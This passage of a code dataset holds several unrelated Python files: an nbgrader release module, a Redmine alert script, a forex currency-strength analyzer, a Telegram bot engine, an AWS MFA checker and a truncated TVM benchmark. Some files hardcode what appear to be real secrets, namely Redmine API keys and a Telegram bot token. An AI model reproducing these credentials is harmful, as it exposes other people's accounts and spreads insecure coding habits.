cfg.ExchangeRelease\n\n        super(ExchangeReleaseAssignment, self)._load_config(cfg, **kwargs)\n\n    def ensure_root(self):\n        pass\n\n    def init_src(self):\n        self.src_path = self.coursedir.format_path(self.coursedir.release_directory, '.', self.coursedir.assignment_id)\n\n        if not os.path.isdir(self.src_path):\n            source = self.coursedir.format_path(self.coursedir.source_directory, '.', self.coursedir.assignment_id)\n            if os.path.isdir(source):\n\n                # Looks like the instructor forgot to assign\n                self.fail(\"Assignment found in '{}' but not '{}', run `nbgrader generate_assignment` first.\".format(source, self.src_path))\n            else:\n                self._assignment_not_found(self.src_path, self.coursedir.format_path(self.coursedir.release_directory, '.', '*'))\n\n    def init_dest(self):\n        if self.coursedir.course_id == '':\n            self.fail(\"No course id specified. 
Re-run with --course flag.\")\n self.dest_path = '/assignment/{}/{}'.format(self.coursedir.course_id, self.coursedir.assignment_id)\n\n def assignment_exists(self):\n url = '/assignments/{}'.format(self.coursedir.course_id)\n response = self.ngshare_api_get(url)\n \n if response is None:\n self.log.error('An error occurred while trying to check if the assignment exists {}.'.format(self.coursedir.course_id))\n return True\n\n if self.coursedir.assignment_id in response['assignments']:\n if self.force:\n self.log.info(\"Overwriting files: {} {}\".format(\n self.coursedir.course_id, self.coursedir.assignment_id\n ))\n delete_url = '/assignment/{}/{}'.format(self.coursedir.course_id, self.coursedir.assignment_id)\n response = self.ngshare_api_delete(delete_url)\n if response is None:\n self.fail('An error occurred while trying to delete {}'.format(self.coursedir.assignment_id))\n return True\n else:\n self.fail('Destination already exists, add --force to overwrite: {} {}'.format(\n self.coursedir.course_id, self.coursedir.assignment_id\n ))\n return True\n\n return False\n\n\n def copy_files(self): \n if not self.assignment_exists():\n self.log.info('Encoding assignment')\n data = self.encode_dir(self.src_path)\n response = self.ngshare_api_post(self.dest_path, data)\n if response is None:\n self.log.warning('An error occurred while trying to release {}'.format(self.coursedir.assignment_id))\n else:\n self.log.info('Successfully released {}'.format(self.coursedir.assignment_id))\n","sub_path":"nbgrader/exchange/ngshare/release_assignment.py","file_name":"release_assignment.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"621036441","text":"path_file = \"/home/javi/Desktop/Links\"\n\ntry:\n f = open(path_file, \"r\")\n for _ in range(10):\n print(next(f))\nexcept Exception:\n print(\"The path variable was incorrect!\")\nfinally:\n f.close()\n print(\"Thank you so much for using my program.\")","sub_path":"Task3_Python_WarmUp/A3_Read_file.py","file_name":"A3_Read_file.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"498423746","text":"import sys\nimport argparse\nimport redmine\n\n__author__ = 'amv'\n\n\"\"\"\n\n\"\"\"\n\n\nauth_params={\"server\": \"http://kspd-tracker\",\n \"key\": \"1b2fb6be316492751a29bf119a1b2f9ca108ad49\"}\n # afa75b57d7446e259dd785976af0a75eb0886223 - Admin\n # 1b2fb6be316492751a29bf119a1b2f9ca108ad49 - zabbix\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"to\", help=\"First zabbix alertscripts command-line variable - To\")\n parser.add_argument(\"subject\", help=\"2-nd zabbix alertscripts command-line variable - Subject\")\n parser.add_argument(\"body\", help=\"3-rd zabbix alertscripts command-line variable - Body\")\n parser.add_argument(\"--list\", action='store_const', const=True, default=False, help=\"Print some redmine lists\")\n parser.add_argument(\"--name\", help=\"Load Subject and Body from text file NAME\")\n args = parser.parse_args()\n return args.to, args.subject, args.body, args.list, args.name\n\n\ndef redmine_connect(server,apikey):\n \"\"\"\n Возвращает объект-коннектор redmine с параметрами: использовать формат '%Y.%m.%d', а также не проводить\n верификацию сертификата сервера\n :param server,key - реквизиты доступа к серверу redmine\n :return: оьъект - коннектор к серверу redmine\n \"\"\"\n\ndef 
get_lists(redmine_descriptor):\n \"\"\"\n Печать и выгрузка в текущий каталог списков проектов, юзеров, групп и трекеров redmine\n :param: коннектор redmine\n :return: нет\n \"\"\"\n\n def printline(fd,s, offset):\n fd.write(offset+str(s)+\"\\n\")\n print(offset+str(s))\n\n def printobject(fd,objs):\n try:\n printline(fd, objs[0],\"\")\n for i in list(objs[1].all()):\n if not isinstance(i,redmine.resources.User):\n printline(fd,str(i.id)+\" \\t\"+i.name,\" \")\n else:\n printline(fd,str(i.id)+\" \\t\"+i.firstname+\" \"+i.lastname,\" \")\n except:\n printline(fd, \"Some error occured!\",\"\")\n\n infolist={\"Projects\":redmine_descriptor.project,\n \"Trackers\":redmine_descriptor.tracker,\n \"Users\":redmine_descriptor.user,\n \"Groups\":redmine_descriptor.group,\n \"Issue statuses\":redmine_descriptor.issue_status}\n fd=open(\"lists\",\"w\", encoding=\"utf-8\")\n for l in infolist.items():\n printobject(fd,l)\n fd.close()\n\noptions = dict(\n loghandler=\"FileHandler\", # Обработчик логов, FileHandler or SysLogHandler\n logdir=\"C:/Amv/Temp/zissue/log\", # Каталог для логфайлов или facility для SysLogHandler\n tmpdir=\"C:/Amv/Temp/zissue\", # Каталог временных файлов\n loglevel=\"DEBUG\", # Уровень логирования\n archivelog=False, # Архивирование логфайлов после ? нереализовано, требует доработки...\n server=\"http://kspd-tracker.life.corp\",\n key=\"\",\n test=True, # В продакшн среде поставить False\n ChannelDOWN = \"message_type project_id tracker_id status_id priority_id assigned_to_id watcher_user_ids \"\n \"channel_id bank office event_id hub channel_type event_date event_time office_comments\",\n ChannelUP = \"message_type channel_id event_id event_recovery_date event_recovery_time event_age\",\n OfficeDOWN = \"message_type project_id tracker_id status_id priority_id assigned_to_id watcher_user_ids \"\n \"office_id bank office event_id event_date event_time office_comments\",\n OfficeUP = \"message_type office_id event_id event_recovery_date event_recovery_time event_age\"\n)\n\nparameters={'assigned_to_id': '6', 'key': '', 'status_id': '1', 'project_id': '2', 'channel_type': 'L2',\n 'server': 'http://kspd-tracker.life.corp', 'tracker_id': '6', 'event_time': '{EVENT.TIME}',\n 'event_id': '223322', 'event_date': '{EVENT.DATE}', 'message_type': 'ChannelDOWN', 'hub': 'ЦО',\n 'channel_id': 'vuzs-1410', 'priority_id': '2', 'bank': 'ВУЗ',\n 'office_comments': 'Нет комментариев', 'watcher_user_ids': '', 'office': 'ОО Победный','cehannel_id': 'vuzs-1410'}\n\nparameters2={'assigned_to_id': '6', 'key': '', 'status_id': '1', 'project_id': '2', 'channel_type': 'L2',\n 'server': 'http://kspd-tracker.life.corp', 'tracker_id': '6', 'event_time': '{EVENT.TIME}',\n 'event_id': '223322', 'event_date': '{EVENT.DATE}', 'message_type': 'ChannelDOWN', 'hub': 'ЦО',\n 'channel_id': 'vuzs-1410', 'priority_id': '2', 'bank': 'ВУЗ',\n 'office_comments': 'Нет комментариев', 'watcher_user_ids': '', 'office': 'ОО Победный'}\n\n\ndef main():\n try:\n fields = options[parameters[\"message_type\"]].split()\n keys = parameters.keys()\n found_fields=[]\n missed_fields=[]\n except KeyError:\n print(\"\\nCritical, message_type parameter not found or incorrect. \")\n sys.exit(1)\n for field in fields:\n if field not in keys:\n missed_fields.append(field)\n else:\n found_fields.append(field)\n if len(missed_fields)>0:\n print(\"\\nCritical, some fields not found: {0}. Found fields: {1}. 
\".format(missed_fields,found_fields))\n else:\n print (\"Found {0} fields: {1}\".format(len(found_fields),found_fields))\n pass\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"Archives/zissue/zissue-test.py","file_name":"zissue-test.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"466500343","text":"import pandas as pd\nimport numpy as np\nfrom mt4zmq import broker_class as broker\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport telegram\nfrom datetime import datetime\nfrom time import sleep\n\nclass timeframe:\n Current = 0\n M1= 1\n M5= 5\n M15= 15\n M30= 30\n H1= 60\n H4= 240\n Daily= 1440\n Weekly = 10080\n Monthly = 43200\n \nclass sig():\n none = 'none'\n buy = 'BUY'\n sell = 'SELL'\n\ndef Calculate_Abs_Strength(Isymbols, Isym_rev, cs_ohlc_0, cs_ohlc_1, prefix):\n \n symbols = Add_Prefix(Isymbols, prefix)\n sym_rev = Add_Prefix(Isym_rev, prefix)\n \n index = np.arange(len(symbols))\n df = pd.DataFrame(index=index, columns=['symbol','C0','C1'])\n \n \n found_index = None\n \n for i in range(len(symbols)): \n df.iloc[i]['symbol'] = symbols[i]\n \n #This loop is to find the index which contain correct symbol\n for index in range(len(cs_ohlc_0)):\n if cs_ohlc_0[index].symbol == symbols[i]:\n found_index = index\n break\n elif index == len(cs_ohlc_0) and cs_ohlc_0[index].symbol != symbols[i] :\n print('Symbol Not Found')\n \n# print(cs_ohlc_0[found_index].symbol, \" == \", symbols[i] )\n \n if cs_ohlc_0[found_index].symbol == symbols[i]:\n if cs_ohlc_0[found_index].symbol in sym_rev :\n df.iloc[i]['C0'] = 1 / cs_ohlc_0[found_index].close\n else:\n df.iloc[i]['C0'] = cs_ohlc_0[found_index].close\n \n if cs_ohlc_1[found_index].symbol == symbols[i]:\n if cs_ohlc_1[found_index].symbol in sym_rev :\n df.iloc[i]['C1'] = 1 / cs_ohlc_1[found_index].close\n else:\n df.iloc[i]['C1'] = cs_ohlc_1[found_index].close\n \n df['change'] = ((df['C0'] - df['C1']) / df['C1']) * 100\n \n return df\n\ndef Get_Strength_Index(timeframe, shift): \n \n symbols = ['EURUSD', 'GBPUSD', 'AUDUSD', 'NZDUSD', 'USDJPY', 'USDCHF','USDCAD', \\\n 'EURJPY', 'GBPJPY', 'AUDJPY', 'NZDJPY', 'CHFJPY','CADJPY',\\\n 'EURGBP', 'GBPAUD', 'GBPNZD', 'GBPCHF', 'GBPCAD', \\\n 'EURAUD', 'EURNZD', 'EURCHF', 'EURCAD', \\\n 'AUDCHF', 'AUDCAD', 'CADCHF', \\\n 'NZDCHF', 'NZDCAD','AUDNZD']\n symbols = Add_Prefix(symbols, prefix)\n \n sym_usd = ['EURUSD','GBPUSD','AUDUSD','NZDUSD','USDJPY','USDCHF','USDCAD']\n sym_USD_rev=['EURUSD','AUDUSD','GBPUSD','NZDUSD']\n \n sym_eur = ['EURUSD', 'EURGBP', 'EURAUD', 'EURNZD', 'EURJPY','EURCHF','EURCAD']\n sym_EUR_rev = []\n \n sym_jpy = ['USDJPY', 'GBPJPY', 'EURJPY', 'AUDJPY', 'NZDJPY', 'CHFJPY', 'CADJPY']\n sym_JPY_rev = []\n \n sym_gbp = ['GBPUSD', 'GBPJPY', 'EURGBP', 'GBPAUD', 'GBPNZD', 'GBPCHF', 'GBPCAD']\n sym_GBP_rev = ['EURGBP']\n \n sym_aud = ['AUDUSD', 'AUDJPY', 'EURAUD', 'GBPAUD', 'AUDNZD', 'AUDCHF', 'AUDCAD']\n sym_AUD_rev = ['EURAUD', 'GBPAUD']\n \n sym_nzd = ['NZDUSD','NZDJPY','EURNZD','GBPNZD','NZDCHF','NZDCAD','AUDNZD']\n sym_NZD_rev = ['EURNZD','GBPNZD', 'AUDNZD']\n \n sym_cad = ['USDCAD','CADJPY','EURCAD','GBPCAD','NZDCAD','AUDCAD','CADCHF']\n sym_CAD_rev = ['USDCAD','EURCAD','GBPCAD','NZDCAD','AUDCAD']\n \n \n sym_chf = ['CHFJPY','USDCHF','EURCHF','GBPCHF','NZDCHF','AUDCHF','CADCHF']\n sym_CHF_rev = ['USDCHF','EURCHF','GBPCHF','NZDCHF','AUDCHF','CADCHF']\n \n cs_d1_0 = broker1.get_OHLC(symbols, timeframe , shift)\n cs_d1_1 = 
broker1.get_OHLC(symbols, timeframe , shift + 1)\n \n datetime = cs_d1_0[0].timestamp\n \n index = np.arange(8)\n strength_df = pd.DataFrame(index=index, columns=['Currency', 'ABS_strength'])\n \n USD_df = Calculate_Abs_Strength(sym_usd, sym_USD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_USD = USD_df['change'].sum()\n strength_df.iloc[0]= ['USD', strength_USD]\n \n EUR_df = Calculate_Abs_Strength(sym_eur, sym_EUR_rev, cs_d1_0, cs_d1_1, prefix)\n strength_EUR = EUR_df['change'].sum()\n strength_df.iloc[1]= ['EUR', strength_EUR]\n \n JPY_df = Calculate_Abs_Strength(sym_jpy, sym_JPY_rev, cs_d1_0, cs_d1_1, prefix)\n strength_JPY = JPY_df['change'].sum()\n strength_df.iloc[2]= ['JPY', strength_JPY]\n \n GBP_df = Calculate_Abs_Strength(sym_gbp, sym_GBP_rev, cs_d1_0, cs_d1_1, prefix)\n strength_GBP = GBP_df['change'].sum()\n strength_df.iloc[3]= ['GBP', strength_GBP]\n \n AUD_df = Calculate_Abs_Strength(sym_aud, sym_AUD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_AUD = AUD_df['change'].sum()\n strength_df.iloc[4]= ['AUD', strength_AUD]\n \n NZD_df = Calculate_Abs_Strength(sym_nzd, sym_NZD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_NZD = NZD_df['change'].sum()\n strength_df.iloc[5]= ['NZD', strength_NZD]\n \n CAD_df = Calculate_Abs_Strength(sym_cad, sym_CAD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_CAD = CAD_df['change'].sum()\n strength_df.iloc[6]= ['CAD', strength_CAD]\n \n CHF_df = Calculate_Abs_Strength(sym_chf, sym_CHF_rev, cs_d1_0, cs_d1_1, prefix)\n strength_CHF = CHF_df['change'].sum()\n strength_df.iloc[7]= ['CHF', strength_CHF]\n \n return strength_df, datetime\n\ndef Add_Prefix(symbols, prefix):\n for s in range(len(symbols)):\n symbols[s] = symbols[s] + prefix \n \n return symbols\n\n#to get Daily and H1 Strength\ndef get_abs_strength(sft_D1, sft_H1):\n \n abs_d1, dt_d1 = Get_Strength_Index(tf.Daily, sft_D1)\n abs_h1, dt_h1 = Get_Strength_Index(tf.H1, sft_H1)\n \n sort_d1 = abs_d1.sort_values('ABS_strength', axis=0, ascending=False)\n sort_h1 = abs_h1.sort_values('ABS_strength', axis=0, ascending=False)\n \n return sort_d1, sort_h1, dt_d1, dt_h1\n\n#ti get series of abs strength \ndef get_timeSeries_strength(timeframe, shift):\n \n abs = []\n \n for i in range(shift):\n abs.append(0)\n \n for i in range(len(abs)):\n abs[i] = Get_Strength_Index(timeframe, i)\n abs[i].rename(columns={'ABS_strength': i },inplace = True)\n \n abs_final = pd.DataFrame\n abs_final = abs[len(abs)-1]\n for i in range(len(abs)):\n abs_final = abs_final.merge(abs[len(abs)-2-i])\n \n return abs_final\n\ndef plot_Chart(d1, h1, date, time):\n \n daily_threshold = 2.0\n hourly_threshold = 1.0\n \n x_axis=np.arange(len(h1))\n width = 0.8\n font_ax = FontProperties()\n font_ax.set_size('xx-small')\n \n font_lbl = FontProperties()\n font_lbl.set_size('small')\n font_lbl.set_style('italic')\n \n font_ttl = FontProperties()\n font_ttl.set_size('small')\n# font_ttl.set_weight('bold')\n \n \n plt.subplot(121)\n plt.bar(x_axis, d1['ABS_strength'], width, color = 'red')\n plt.xticks(x_axis,d1['Currency'], fontproperties=font_ax, rotation=90)\n plt.xlabel('currency', fontproperties= font_lbl )\n plt.ylabel('% Change', fontproperties= font_lbl)\n plt.hlines(daily_threshold,0,len(d1), linestyles='--', color='k' )\n plt.hlines(-daily_threshold,0,len(d1), linestyles='--', color='k' )\n plt.title('Daily Absolute Strength\\n ' + str(date), fontproperties= font_ttl)\n \n plt.subplot(122)\n plt.bar(x_axis, h1['ABS_strength'], width, color = 'blue')\n plt.xticks(x_axis,h1['Currency'],fontproperties=font_ax, rotation=90)\n 
plt.xlabel('currency', fontproperties= font_lbl)\n plt.hlines(hourly_threshold,0,len(h1), linestyles='--', color='k' )\n plt.hlines(-hourly_threshold,0,len(h1), linestyles='--', color='k' )\n plt.title('Hourly Absolute Strength\\n' + str(time), fontproperties= font_ttl)\n plt.savefig('index.png')\n# plt.show()\n \n############################ To detect signal #################################\ndef Get_Signal(symbol, d1, h1):\n# trade_pair = ['EURUSD','GBPUSD','USDJPY','EURJPY']\n daily_high_thres = 2\n daily_low_thres = 0.25\n hourly_high_thres = 1\n hourly_low_thres = 0.25\n \n #get currency\n base_currency = symbol[:3]\n quote_currency = symbol[3:]\n \n# print('\\n', base_currency, quote_currency)\n \n #get base and quote strength for trend (Daily)\n base_sgth_d1 = d1[d1['Currency'] == base_currency].iloc[0,1]\n quote_sgth_d1 = d1[d1['Currency'] == quote_currency].iloc[0,1]\n \n #get base and quote strength for entry (H1)\n base_sgth_h1 = h1[h1['Currency'] == base_currency].iloc[0,1]\n quote_sgth_h1 = h1[h1['Currency'] == quote_currency].iloc[0,1]\n \n# Base Currency factor \n # Check for trend --- Daily\n si = sig()\n signal = si.none\n BUY_trend = False\n SELL_trend = False\n BUY_entry = False\n SELL_entry = False\n \n if base_sgth_d1 > daily_high_thres and quote_sgth_d1 < daily_low_thres :\n BUY_trend = True\n if base_sgth_h1 < -hourly_high_thres and quote_sgth_h1 > -hourly_low_thres :\n BUY_entry = True\n signal = sig.buy\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n elif base_sgth_d1 < -daily_high_thres and quote_sgth_d1 > -daily_low_thres :\n SELL_trend = True\n if base_sgth_h1 > hourly_high_thres and quote_sgth_h1 < hourly_low_thres :\n SELL_entry = True\n signal = sig.sell\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n# Quote currency factor\n #trend Daily\n elif quote_sgth_d1 < -daily_high_thres and base_sgth_d1 > -daily_low_thres :\n BUY_trend = True\n if quote_sgth_h1 > hourly_high_thres and base_sgth_h1 < hourly_low_thres :\n signal = sig.buy\n BUY_entry = True\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n elif quote_sgth_d1 > daily_high_thres and base_sgth_d1 < daily_low_thres :\n SELL_trend = True\n if quote_sgth_h1 < -hourly_high_thres and base_sgth_h1 > -hourly_low_thres :\n signal = sig.sell\n SELL_entry = True\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n #print trend and entry\n# if(BUY_trend or SELL_trend or BUY_entry or SELL_entry):\n# print('\\nsymbol:',symbol)\n# print('Buy Trend:', BUY_trend, ' Sell Trend', SELL_trend ,\\\n# '\\nBuy Entry', BUY_entry,' Sell Entry', SELL_entry) \n \n if BUY_entry:\n signal = si.buy\n elif SELL_entry:\n signal = si.sell\n \n return signal\n \n\n#################################### MAIN #####################################\n\ntoken='488376978:AAFvFovR-Zin9VXR-AhCs0RRXXP149s_rdk'\nbot = telegram.Bot(token= token)\nchat_id=-1001142683257\n\n\n\ntf = timeframe()\n\nprefix ='.lmx'\nmagic_number = 123456\nip_add_1 = '127.0.0.100'\nip_add_2 = '127.0.0.200'\nip_1 = 'tcp://'+ ip_add_1\nip_2 = 'tcp://'+ ip_add_2\n\nbroker1 = broker(ip_1, magic_number)\nbroker2 = broker(ip_2, magic_number)\n\nbroker1.get_acct_info()\nprint(broker1.company)\n\nprev_time = None\ncurr_time = None\n\n#while(1):\n \ncurr_time = datetime.now().hour\n\n#while(curr_time != prev_time):\n\nprev_time = curr_time\nprint(str(prev_time))\n\n\nsig_detect = []\nrecord_tms = []\n\ndaily_CS_shift = 2\nh1_cs_start = 21\nh1_cs_end = 45\n\nfor i in 
np.arange(h1_cs_start, h1_cs_end):\n \n print(i)\n d1, h1, dt_d1, dt_h1 = get_abs_strength(daily_CS_shift,i)\n \n date = dt_d1.date()\n time = dt_h1.time()\n# print('Date:',dt_d1,'\\nTime:',dt_h1)\n \n plot_Chart(d1, h1, date, time)\n \n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n # bot.send_photo(chat_id=chat_id, photo=open('index.png','rb'), \\\n # caption='absolute strength index\\n'+timestamp)\n \n # sleep(300) #sleep for 5 minit\n \n #trade_pair = ['EURUSD','GBPUSD','USDJPY','EURJPY']\n \n trade_pair = ['EURUSD', 'GBPUSD', 'AUDUSD', 'NZDUSD', 'USDJPY', 'USDCHF','USDCAD', \\\n 'EURJPY', 'GBPJPY', 'AUDJPY', 'NZDJPY', 'CHFJPY','CADJPY',\\\n 'EURGBP', 'GBPAUD', 'GBPNZD', 'GBPCHF', 'GBPCAD', \\\n 'EURAUD', 'EURNZD', 'EURCHF', 'EURCAD', \\\n 'AUDCHF', 'AUDCAD', 'CADCHF', \\\n 'NZDCHF', 'NZDCAD','AUDNZD']\n \n \n \n for symbol in trade_pair:\n \n \n signal = Get_Signal(symbol, d1, h1)\n if signal != sig.none:\n# print('Signal:', signal) \n sig_detect.append(str(i) + ' '+str(dt_h1) + ' ' + symbol + ' ' + signal)\n \n \n record_tms.append(str(dt_h1))\n \nprint('\\n',sig_detect)\nprint('\\n',record_tms)\n\n ","sub_path":"OLD/Avengers_Analyzer.py","file_name":"Avengers_Analyzer.py","file_ext":"py","file_size_in_byte":12481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"308695651","text":"import json\r\nimport telebot\r\nfrom datetime import datetime\r\nimport calendar\r\nimport math\r\nfrom time import sleep\r\nfrom threading import Thread\r\nfrom telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, InputMedia\r\n\r\nBUTTONS_PATH = \"config/buttons.json\"\r\nTEXTS_PATH = \"config/texts.json\"\r\nCONFIG_PATH = \"config/config.json\"\r\nLOGS_PATH = \"logs/\"\r\n\r\nclass ChatUtil():\r\n def __init__(self, id): self.id = id\r\n\r\nclass MessageUtil():\r\n def __init__(self, chatid, messageid):\r\n self.chat = ChatUtil(chatid)\r\n self.message_id = messageid\r\n\r\nclass Engine():\r\n\r\n def __init__(self): \r\n config = json.load(open(CONFIG_PATH, encoding = 'utf-8'))\r\n self.bot = telebot.TeleBot(config['bot']['token'])\r\n self.messages = self.bot.message_handler\r\n self.callbacks = self.bot.callback_query_handler\r\n\r\n def start_polling(self, sleep = 30): BotThread(self, self.bot, sleep).start()\r\n def get_default_params(self, sender):\r\n return {\r\n \"id\": sender.id, \r\n \"firstname\": sender.first_name if sender.first_name else self.get_text(\"anonimous\"),\r\n \"lastname\": sender.last_name if sender.last_name else \"\", \r\n \"username\": \"@\" + sender.username if sender.username else \"\"\r\n } \r\n\r\n def b(self, t, d): return InlineKeyboardButton(text = t, callback_data = d)\r\n def bu(self, t, u): return InlineKeyboardButton(text = t, url = u) \r\n\r\n def build(self, buttons = [], params = {}):\r\n markup = InlineKeyboardMarkup()\r\n for row in buttons:\r\n if type(row) == type([]):\r\n _row = []\r\n for button in row:\r\n if type(button) == type({}):\r\n if \"text\" in button.keys():\r\n text = self.format(button['text'], params)\r\n if \"data\" in button.keys(): \r\n data = self.format(button['data'], params)\r\n _row.append(self.b(text, data))\r\n elif \"url\" in button.keys(): \r\n url = self.format(button['url'], params)\r\n _row.append(self.bu(text, url))\r\n markup.row(*_row)\r\n elif type(row) == type({}):\r\n if \"text\" in row.keys():\r\n text = self.format(row['text'], params)\r\n if \"data\" in row.keys(): \r\n data = self.format(row['data'], params)\r\n markup.row(self.b(text, 
data))\r\n elif \"url\" in row.keys(): \r\n url = self.format(row['url'], params)\r\n markup.row(self.bu(text, url)) \r\n return markup \r\n \r\n def get_message(self, chatid, messageid): \r\n message = MessageUtil(chatid, messageid)\r\n return message\r\n\r\n def format(self, text, params = {}):\r\n if text:\r\n for key, value in params.items(): text = text.replace(f\"${key}\", str(value))\r\n return text\r\n\r\n def get_text(self, tag, locale = \"ua\"):\r\n texts = json.load(open(TEXTS_PATH, encoding = 'utf-8'))\r\n try: return texts[locale][tag] if type(tag) == type(\"_\") else texts[locale][list(texts[locale].keys())[tag]]\r\n except: pass \r\n\r\n def get_button(self, tag, locale = \"ua\"):\r\n buttons = json.load(open(BUTTONS_PATH, encoding = 'utf-8'))\r\n try: return buttons[locale][tag] if type(tag) == type(\"_\") else buttons[locale][list(buttons[locale].keys())[tag]]\r\n except: pass \r\n\r\n def send(self, id, text, markup = None, params = {}, photo = None):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n if photo: return self.send_photo(id, photo, text, markup, params)\r\n else:\r\n try: return self.bot.send_message(id, self.format(text, params), parse_mode = 'html', reply_markup = markup, disable_web_page_preview = True)\r\n except Exception as e: print(e)\r\n\r\n def send_photo(self, id, photo, caption = None, markup = None, params = {}):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n try: return self.bot.send_photo(id, photo, caption = self.format(caption, params), parse_mode = 'html', reply_markup = markup)\r\n except: pass\r\n\r\n def edit(self, message, text, markup = None, params = {}, photo = None):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n if photo:\r\n media = InputMedia(\"photo\", photo, self.format(text, params), \"html\")\r\n try: return self.bot.edit_message_media(media, message.chat.id, message.message_id, reply_markup = markup)\r\n except:\r\n self.delete(message)\r\n return self.send_photo(message.chat.id, photo, text, markup, params)\r\n else:\r\n try: return self.bot.edit_message_text(self.format(text, params), message.chat.id, message.message_id, parse_mode = 'html', reply_markup = markup, disable_web_page_preview = True)\r\n except: \r\n try:\r\n self.delete(message)\r\n return self.send(message.chat.id, text, markup, params)\r\n except: pass\r\n\r\n def edit_markup(self, message, markup, params = {}):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n try: return self.bot.edit_message_reply_markup(message.chat.id, message.message_id, reply_markup = markup)\r\n except Exception as e: print(e) \r\n\r\n def delete(self, message):\r\n try: self.bot.delete_message(message.chat.id, message.message_id)\r\n except: pass\r\n\r\n def send_tag(self, id, tag, markup = None, params = {}, photo = None):\r\n text = self.get_text(tag)\r\n return self.send(id, text, markup, params, photo)\r\n\r\n def edit_tag(self, message, tag, markup = None, params = {}, photo = None):\r\n text = self.get_text(tag)\r\n return self.edit(message, text, markup, params, photo)\r\n\r\nclass BotThread(Thread):\r\n def __init__(self, engine, bot, time = 30): \r\n self.bot = bot\r\n self.engine = engine\r\n self.time = time\r\n Thread.__init__(self)\r\n def run(self): \r\n while True:\r\n try: self.bot.polling()\r\n except Exception as e:\r\n self.engine.log(e)\r\n sleep(self.time) 
","sub_path":"My_project/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"557177118","text":"#!/usr/bin/python\nimport datetime\nimport csv\nimport glob\nimport xlwt\nimport os\nimport boto.ec2\nimport boto.iam.connection\n\n#GET all regions\nregions= boto.ec2.regions()\n#function to check if MFA is enabled on account\ndef func_MFA_enabled():\n\n\tconnection=boto.iam.connection.IAMConnection()\n\tusers=connection.get_all_users()\n\tno_of_users=len(users['list_users_response']['list_users_result']['users'])\n\twith open('MFA_Enabled.csv','w+') as fp:\n\t\tcsvwriter=csv.writer(fp,delimiter=',')\n\t\tdata=['User Name','MFA Status']\n\t\tcsvwriter.writerow(data)\n\t\tfor user in range(0,no_of_users):\n\t\t\tuser_name=users['list_users_response']['list_users_result']['users'][user]['user_name']\n\t\t\tmfa=connection.get_all_mfa_devices(user_name)\n\t\t\tstatus=mfa['list_mfa_devices_response']['list_mfa_devices_result']['mfa_devices']\n\t\t\tif len(status)==0:\n\t\t\t\tdata=[user_name,\"Not Enabled\"]\n\t\t\t\tcsvwriter.writerow(data)\n\t\t\telse:\n\t\t\t\tdata=[user_name,\"Enabled\"]\n\t\t\t\tcsvwriter.writerow(data)\n\t\t\t\t\nfunc_MFA_enabled()\n\n","sub_path":"iam-boto/mfa_check.py","file_name":"mfa_check.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"474560275","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\"\"\"Benchmark script for various models on Adreno GPU.\n\"\"\"\nimport argparse\n\nimport numpy as np\n\nimport os\nimport sys\nimport tvm\nfrom tvm import te\nfrom tvm.relay import testing\nfrom tvm.contrib.utils import tempdir\nimport tvm.contrib.graph_executor as runtime\nfrom tvm import relay\nfrom tvm import autotvm\nfrom tvm.contrib import utils, ndk\n\n\ndef get_network(name, batch_size, dtype=\"float32\"):\n    \"\"\"Get the symbol definition and random weight of a network\n\n    Parameters\n    ----------\n    name: str\n        The name of the network, can be 'resnet-18', 'resnet-50', 'vgg-16', 'inception_v3', 'mobilenet', ...\n    batch_size: int\n        batch size\n    dtype: str\n        Data type\n\n    Returns\n    -------\n    net: tvm.IRModule\n        The relay function of network definition\n    params: dict\n        The random parameters for benchmark\n    input_shape: tuple\n        The shape of input tensor\n    output_shape: tuple\n        The shape of output tensor\n    \"\"\"\n    input_shape = (batch_size, 3, 224, 224)\n    output_shape = (batch_size, 1000)\n\n    if name == \"mobilenet\":\n        net, params = testing.mobilenet.get_workload(batch_size=batch_size, dtype=dtype)\n    elif name == \"inception_v3\":\n        input_shape = (batch_size, 3, 299, 299)\n        net, params = testing.inception_v3.get_workload(batch_size=batch_size, dtype=dtype)\n    elif \"resnet\" in name:\n        n_layer = int(name.split(\"-\")[1])\n        net, params = 